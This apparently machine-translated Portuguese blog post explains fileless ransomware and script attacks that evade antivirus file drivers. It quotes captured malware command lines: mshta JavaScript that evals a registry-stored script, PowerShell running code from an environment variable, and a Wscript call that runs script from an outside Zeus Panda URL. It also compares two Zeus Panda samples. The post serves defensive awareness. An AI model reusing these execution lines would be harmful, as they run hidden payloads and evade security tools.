Tocando Agora

Bem Vindo

Bem vindo ao nosso blog, aonde discutimos vários tópicos do dia-a-dia, e um parcial de nossa rádio web (www.computersservice.radio.br)

sábado, 15 de julho de 2017


Infecções sem arquivo - o último truque de Ransomware


Se alguém pensou que o susto do Ransomware WannaCry de maio de 2017 era ruim, é apenas o começo. Todos os anos, à medida que são pagos mais resgates, os cibercriminosos têm mais capital para investir em novas tecnologias e técnicas. Uma de suas técnicas mais promissoras é infecções sem arquivo ou ataques de script.

Historicamente, o malware e agora o ransomware furtivamente um programa em um computador, e então, abertamente ou secretamente, tentaram a execução desse arquivo. O tópico comum nesses ataques é que um arquivo é baixado e, em seguida, tenta executar. A arquitetura do software antivírus emprega um driver de sistema de arquivos. Esse driver trava o arquivo e depois determina se ele pode ser executado.

Um malware sem arquivo não descarta um arquivo e ignora o driver do sistema de arquivos do AV mainstream. Em vez disso, os scripts são escritos e executados através de conhecidos mecanismos de script, como Powershell, MSHTA, Cscript e Wscript. Mostre e diga a hora.

C: \ WINDOWS \ system32 \ mshta.exe "javascript: QNm90c =" 8YNUG ";
S07R = novo ActiveXObject ("WScript.Shell"); E91eHqEE = "l"; L21MJb = S07R.RegRead ("HKCU \\ software \\ lfxqiypm \\ qkkqsiqrqk"); G0dn1w = "jSJKZ"; Eval (l21MJb); GQEXz2t = "apyD"; "
 
O comando acima invoca o MSHTA, que é um conhecido bem conhecido aplicativo Microsoft. O comando chama Javascipt, que por sua vez chama Wscript para executar um script a partir de uma chave de registro com caracteres aleatórios. Uma vez que o script reside em uma chave de registro, não há nenhum arquivo para o driver do sistema de arquivos para analisar.
 
"C: \ WINDOWS \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe" iex $ env: kuihcdc

O comando acima instrui o Powershell, outro mecanismo de script Microsoft válido, para executar um script a partir de uma variável de ambiente com caracteres aleatórios. Uma vez que o script reside em uma variável de ambiente em vez de um arquivo, o driver do sistema de arquivos tem visibilidade zero neste tipo de atividade.

Wscript // B // E: JScript OTTYUADAF "gexywoaxor" "http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDP
g5_U_kDbMAl19pucJOw6mF4&es_sm=140&

O comando acima executa o Wscript, outro mecanismo de script Microsoft válido e, em seguida, muda para o Javascript e executa o script diretamente de um site com uma seqüência de consulta gnarly. Vamos pensar sobre isso. O comando acima está instruindo wscript a executar o código diretamente de um site externo sem um arquivo atingindo o driver do sistema de arquivos.
 
Se alguém faz uma pesquisa na estranha string "gexywoaxor", descobre-se que esse malware é um trojan bancário chamado Zeus Panda descoberto por Forcepoint.

O artigo está datado de julho de 2016 e o ​​PC Matic bloqueou a amostra em novembro de 2016, 4 meses depois.


Amostra de ponto de força
Amostra PC Matic
Encontro
Julho de 2016
Novembro de 2016
Mecanismo de script
Wscript
Wscript
Nome do arquivo de script
R3ak.tmp
OTTYUADAF
Chave de criptografia
Gexwoaxor
Gexwoaxor
URL
Ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh
Hit.thincoachmd.com
 
Nesses quatro meses, houve mudanças visíveis no método de ataque, no entanto, a chave de criptografia crítica "gexywoaxor" permaneceu inalterada. O fato de que uma nova chave de criptografia não era necessária era um sinal de que este vírus tinha sucesso na entrega da sua carga útil.

Os ataques de script ou infecções sem arquivo estão aqui hoje. 25% de todos os blocos de PC Matic de malware estão no nível de script. De forma justa, no ambiente de hoje, com freqüência, um ataque de script envolve o lançamento de um arquivo mais tarde para ser executado. Nesse caso, há um segundo ponto em que uma abordagem de placa de arquivos / lista negra pode capturar e bloquear a intrusão. O problema é que nem todos os ataques de script soltam um arquivo e isso representa um buraco de segurança no antivírus da sua empresa.

Nenhum comentário:

Postar um comentário